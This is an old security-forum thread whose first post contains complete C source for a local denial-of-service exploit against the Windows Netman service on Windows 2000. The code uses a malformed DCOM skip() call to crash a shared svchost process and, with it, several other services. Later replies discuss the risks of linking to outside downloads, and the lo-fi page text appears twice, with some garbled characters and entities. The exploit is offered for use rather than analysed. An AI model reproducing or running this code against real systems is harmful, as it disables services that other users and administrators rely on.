Windows Netman Service Local Denial Of Service

Full Version: Windows Netman Service Local Denial Of Service

GovernmentSecurity.org > System Security > Windows Systems

apoc_neo

Jul 13 2005, 01:36 AM

(2005-07-14) Windows Netman Service Local Denial of Service

CODE

/* Windows Netman Service Local DOS Vulnerability.
*
* By bkbll bkbll#cnhonker.net 2005-7-14 2:49??
*
* TESTED ON win2k sp4
*
* ??Netman???svchost.exe -k netsvcs??, ????????,????????:
*
* EventSystem,Irmon,RasMan,NtmsSvc,SENS
*
*/
#define _WIN32_DCOM

#include <stdio.h>
#include <stdlib.h>
#include <objbase.h>
#include <unknwn.h>
#include <windows.h>

#pragma comment(lib,"ole32")

MIDL_INTERFACE("98133274-4B20-11D1-AB01-00805FC1270E")
VCConnectionManagerEnumConnection //: public IDispatch
{
public:
virtual HRESULT STDMETHODCALLTYPE QueryInterface(void) = 0;
virtual ULONG STDMETHODCALLTYPE AddRef( void) = 0;
virtual ULONG STDMETHODCALLTYPE Release( void) = 0;
virtual HRESULT STDMETHODCALLTYPE next(void) = 0;
virtual HRESULT STDMETHODCALLTYPE skip(DWORD) = 0;
virtual HRESULT STDMETHODCALLTYPE reset(void) = 0;
virtual HRESULT STDMETHODCALLTYPE clone(void) = 0;
};
CLSID CLSID_ConnectionManagerEnumConnection = {0x0BA126AD2,0x2166,0x11D1,{0xB1,0xD0, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}};
IID IID_IEnumNetConnection = {0xC08956A0,0x1CD3,0x11D1,{0x0B1,0x0C5, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}};

//???
main(int argc,char **argv)
{
VCConnectionManagerEnumConnection *clientcall;
HRESULT hr;

printf("Windows Netman Service Local DOS Vulnerability..\n\n");
//???
CoInitializeEx(NULL,COINIT_MULTITHREADED);

printf("DCOM Client Trying started\n");
hr = CoCreateInstance& #40;CLSID_ConnectionManagerEnumConnection,NULL,CLSCTX_LOCAL_SERVER,IID_IEnumNetC
onnection,(void**)&clientcall);
if (hr != S_OK)
{
printf("CoCreateInstanceEx failed:%d\n",GetLastError());
return -1;
}
printf("Exploit netman service ....\n");
hr = clientcall->skip(0x80000001);//(void**)&p);
if(SUCCEEDED(hr))
{
printf("Call client proc Success.\n");
}
else
printf("Call client proc failed:%d\n",GetLastError());
hr = clientcall->Release();
CoUninitialize();
printf("Client exited.\n");
return 1;
}

Download Here

Hope you enjoy this is latest exploit

Also i am new here so if i did anything wrong please don't delete my account just give me a heads up

myth

Jul 13 2005, 06:03 AM

Welcome to GSO then apoc_neo

Just some pointers, the peeps here wont really need the PoC compiled, and linked from an fxp site... That might get you in abit of trouble....

GSecur

Jul 13 2005, 03:02 PM

yeah I am not a big fan of linking to downloads on other sites because it makes me nervous that they can just randomly switch the file around with a virus one. I prefer that people locally load the exploits since GSO does already allow that.

apoc_neo

Jul 13 2005, 04:33 PM

ok np it isn't fxp site we just got the host for free and bought a domain but the host tunred out to be shit so we have nothing on it.

apoc_neo

Jul 13 2005, 04:36 PM

QUOTE(GSecur @ Jul 13 2005, 03:02 PM)

oh and about the virus thing i know that some people here do that but i don't... can't realy proove that in anyway but i am not that kind of person, there is just no use in using trojans to hack people.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.


Help - Search - Member List - Calendar Full Version: Windows Netman Service Local Denial Of Service GovernmentSecurity.org > System Security > Windows Systems apoc_neo Jul 13 2005, 01:36 AM (2005-07-14) Windows Netman Service Local Denial of Service CODE /* Windows Netman Service Local DOS Vulnerability. * * By bkbll bkbll#cnhonker.net 2005-7-14 2:49?? * * TESTED ON win2k sp4 * * ??Netman???svchost.exe -k netsvcs??, ????????,????????: * * EventSystem,Irmon,RasMan,NtmsSvc,SENS * / #define _WIN32_DCOM #include <stdio.h> #include <stdlib.h> #include <objbase.h> #include <unknwn.h> #include <windows.h> #pragma comment(lib,"ole32") MIDL_INTERFACE("98133274-4B20-11D1-AB01-00805FC1270E") VCConnectionManagerEnumConnection //: public IDispatch { public: virtual HRESULT STDMETHODCALLTYPE QueryInterface(void) = 0; virtual ULONG STDMETHODCALLTYPE AddRef( void) = 0; virtual ULONG STDMETHODCALLTYPE Release( void) = 0; virtual HRESULT STDMETHODCALLTYPE next(void) = 0; virtual HRESULT STDMETHODCALLTYPE skip(DWORD) = 0; virtual HRESULT STDMETHODCALLTYPE reset(void) = 0; virtual HRESULT STDMETHODCALLTYPE clone(void) = 0; }; CLSID CLSID_ConnectionManagerEnumConnection = {0x0BA126AD2,0x2166,0x11D1,{0xB1,0xD0, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}}; IID IID_IEnumNetConnection = {0xC08956A0,0x1CD3,0x11D1,{0x0B1,0x0C5, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}}; //??? main(int argc,char argv) { VCConnectionManagerEnumConnection clientcall; HRESULT hr; printf("Windows Netman Service Local DOS Vulnerability..\n\n"); //??? CoInitializeEx(NULL,COINIT_MULTITHREADED); printf("DCOM Client Trying started\n"); hr = CoCreateInstance& #40;CLSID_ConnectionManagerEnumConnection,NULL,CLSCTX_LOCAL_SERVER,IID_IEnumNetC onnection,(void)&clientcall); if (hr != S_OK) { printf("CoCreateInstanceEx failed:%d\n",GetLastError()); return -1; } printf("Exploit netman service ....\n"); hr = clientcall->skip(0x80000001);//(void)&p); if(SUCCEEDED(hr)) { printf("Call client proc Success.\n"); } else printf("Call client proc failed:%d\n",GetLastError()); hr = clientcall->Release(); CoUninitialize(); printf("Client exited.\n"); return 1; } Download Here Hope you enjoy this is latest exploit Also i am new here so if i did anything wrong please don't delete my account just give me a heads up myth Jul 13 2005, 06:03 AM Welcome to GSO then apoc_neo Just some pointers, the peeps here wont really need the PoC compiled, and linked from an fxp site... That might get you in abit of trouble.... GSecur Jul 13 2005, 03:02 PM yeah I am not a big fan of linking to downloads on other sites because it makes me nervous that they can just randomly switch the file around with a virus one. I prefer that people locally load the exploits since GSO does already allow that. apoc_neo Jul 13 2005, 04:33 PM ok np it isn't fxp site we just got the host for free and bought a domain but the host tunred out to be shit so we have nothing on it. apoc_neo Jul 13 2005, 04:36 PM QUOTE(GSecur @ Jul 13 2005, 03:02 PM) yeah I am not a big fan of linking to downloads on other sites because it makes me nervous that they can just randomly switch the file around with a virus one. I prefer that people locally load the exploits since GSO does already allow that. oh and about the virus thing i know that some people here do that but i don't... can't realy proove that in anyway but i am not that kind of person, there is just no use in using trojans to hack people. This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.